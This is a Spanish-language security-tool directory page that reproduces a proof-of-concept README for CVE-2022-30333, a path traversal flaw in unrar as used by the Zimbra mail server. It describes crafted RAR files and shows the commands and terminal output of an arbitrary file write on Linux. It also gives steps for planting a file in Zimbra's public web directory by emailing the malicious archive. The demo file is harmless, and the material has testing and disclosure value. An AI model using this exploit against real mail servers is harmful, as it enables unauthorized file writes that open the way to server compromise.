Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

Exploit de prueba de concepto para CVE-2022-30333, una vulnerabilidad de path traversal en unrar utilizado por Zimbra, que demuestra escritura arbitraria de archivos mediante archivos RAR manipulados.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
133hace 4 añosAún no revisado
Compartir

CVE-2022-30333-POC

Archivo de muestra para probar CVE-2022-30333

  • Sample.rar : si quieres probar en Linux. Al extraerlo, crea trav en ../../tmp/traversed. Asegúrate de que el directorio ../../tmp/traversed exista antes de extraer Sample.rar

  • exp.rar : si quieres probar en el servidor de correo Zimbra. Al extraerlo, crea moo.txt en /opt/zimbra/jetty_base/webapps/zimbra/public/. Puedes acceder a este archivo en https://zimbra_mail_domain/public/moo.txt

PASOS DE EXPLOTACIÓN

Pruebas en Linux

root@kitploit:~
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Pruebas en Zimbra

  • Crea un correo electrónico y adjunta el archivo rar malicioso, luego envíalo a una dirección de correo de Zimbra. Este archivo rar será extraído mientras se analiza con Amavisd.
  • El archivo moo.txt debería estar en: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt o https://zimbra_mail_domain/public/moo.txt

REFERENCIAS

  1. Blog vietnamita de DEV2SEC
  2. Blog en inglés de Sonarsource
  3. Agradecimientos especiales a mrlihd por ayudarme a reconstruir la cadena de ataque en Zimbra
Descargar herramienta